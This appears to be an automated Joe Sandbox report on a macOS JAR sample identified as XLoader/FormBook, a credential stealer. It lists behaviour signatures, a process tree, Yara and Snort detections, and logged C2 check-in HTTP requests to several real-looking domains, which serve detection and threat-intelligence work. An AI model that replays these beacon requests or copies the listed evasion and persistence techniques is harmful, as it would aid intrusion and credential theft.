Loading ...

Play interactive tourEdit tour

macOS Analysis Report Statement SKBMT 09818.jar

Overview

General Information

Sample Name:Statement SKBMT 09818.jar
Analysis ID:1032
MD5:4ded6a1d590e8a31ae6b9ea0ffb3331d
SHA1:b8c0167341d3639eb1ed2636a56c272dc66546fa
SHA256:81c4276f2e3c0ed456b08402a6a5b63d0cad68220b7a3275b3cbf0ba73faaa21
Infos:

Most interesting Screenshot:

Detection

XLoader
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Found XLoader JAR binder / loader
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected XLoader
Accesses directories and/or files with sensitive browser data likely for credential stealing
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Executes hidden files
Java spawns dropped Mach-O files
Writes Mach-O files to hidden directories
Changes permissions of written Mach-O files
Creates application bundles
Creates hidden files, links and/or directories
Creates memory-persistent launch services
Creates user-wide 'launchd' managed services aka launch agents
Executes commands using a shell command-line interpreter
HTTP GET or POST without a user agent
Mach-O contains sections with high entropy indicating compressed/encrypted content
Reads hardware related sysctl values
Reads launchservices plist files
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads the systems OS release and/or type
Reads the systems hostname
Writes 64-bit Mach-O files to disk

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:1032
Start date:22.07.2021
Start time:14:09:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 6s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Statement SKBMT 09818.jar
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
Analysis Mode:default
Detection:MAL
Classification:mal92.troj.spyw.evad.macJAR@0/9@24/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 17.253.109.201, 17.253.113.202, 17.253.113.201, 17.253.54.253, 17.253.54.125, 17.253.108.253, 17.253.108.125, 17.253.54.251
  • Excluded domains from analysis (whitelisted): ocsp.apple.com, valid.origin-apple.com.akadns.net, time-macos.apple.com, time-osx.g.aaplimg.com, ocsp-a.g.aaplimg.com, valid-apple.g.aaplimg.com, crl.apple.com, valid.apple.com, ocsp-lb.apple.com.akadns.net, lb._dns-sd._udp.0.11.168.192.in-addr.arpa
  • VT rate limit hit for: zincfacemask.com

Process Tree

  • System is macvm-highsierra
  • Jar Launcher (MD5: fbf3f7600341147960760ba67d456816) Arguments: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher
    • java (MD5: f1ccfcbe272f38c2cdafba7a7ddfc5dc) Arguments: /usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar
    • java (MD5: 1f2f4e0dc30c84d99d4d852fd4400c92) Arguments: /usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar
      • kIbwf02l (MD5: a17bf4533d7ec677a0d4bdae19e41ff2) Arguments: /Users/berri/kIbwf02l
        • sh New Fork (PID: 557, Parent: 556)
        • NBNlRBXH (MD5: a17bf4533d7ec677a0d4bdae19e41ff2) Arguments: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
  • Preview (MD5: 14cc1485ead8fac8c80d49d481383f69) Arguments: /Applications/Preview.app/Contents/MacOS/Preview
  • cleanup

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
/Users/berri/kIbwf02lJoeSecurity_XLoaderYara detected XLoaderJoe Security
    /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXHJoeSecurity_XLoaderYara detected XLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmpJoeSecurity_XLoaderYara detected XLoaderJoe Security
        00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmpJoeSecurity_XLoaderYara detected XLoaderJoe Security

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Statement SKBMT 09818.jarVirustotal: Detection: 35%Perma Link
          Yara detected XLoaderShow sources
          Source: Yara matchFile source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: /Users/berri/kIbwf02l, type: DROPPED
          Source: Yara matchFile source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
          Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
          Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
          Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
          Source: unknownTCP traffic detected without corresponding DNS query: 2.20.214.243
          Source: unknownTCP traffic detected without corresponding DNS query: 2.20.214.243
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ssmjoin.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 12:11:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2CF-Cache-Status: MISSServer: cloudflareCF-RAY: 672c920cacb70211-ZRHData Raw: 32 32 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 09 45 78 70 6c 6f 72 69 6e 67 20 45 6c 6c 65 20 26 6d 64 61 73 68 3b 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 0a 09 09 09 73 72 63 3d 22 68 74 74 70 3a 2f 2f 65 78 70 6c 6f 72 69 6e 67 2d 65 6c 6c 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 65 78 70 6c 6f 72 69 6e 67 2d 65 6c 6c 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 62 6c 75 65 68 6f 73 74 2d 77 6f 72 64 70 72 65 73 73 2d 70 6c 75 67 69 6e 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 73 2d 62 6c 75 65 68 6f 73 74 2d 62 67 2e 6a 70 67 22 29 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 74 6f 70 20 72 69 67 68 74 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2a 20 7b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 6e 70 75 74 20 7b 0a 09 09 09 09 66 6f 6e 74
          Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
          Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmpString found in binary or memory: http://crl.apple.com/root.crl0
          Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmpString found in binary or memory: http://crl.apple.com/timestamp.crl0
          Source: java, 00000555.00000246.9.00000001025ab000.00000001025c8000.r-x.sdmpString found in binary or memory: http://java.oracle.com/
          Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmpString found in binary or memory: http://ocsp.apple.com/ocsp04-devid010
          Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
          Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
          Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca0
          Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
          Source: java, 00000555.00000246.9.00000001230e8000.00000001232a1000.r--.sdmpString found in binary or memory: http://www.apple.com/http://www.apple.com/Copyright
          Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180

          E-Banking Fraud:

          barindex
          Yara detected XLoaderShow sources
          Source: Yara matchFile source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: /Users/berri/kIbwf02l, type: DROPPED
          Source: Yara matchFile source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

          System Summary:

          barindex
          Found XLoader JAR binder / loaderShow sources
          Source: oBSrz/OBSrz.javaJava decompliation: Binder APIs
          Source: classification engineClassification label: mal92.troj.spyw.evad.macJAR@0/9@24/0

          Data Obfuscation:

          barindex
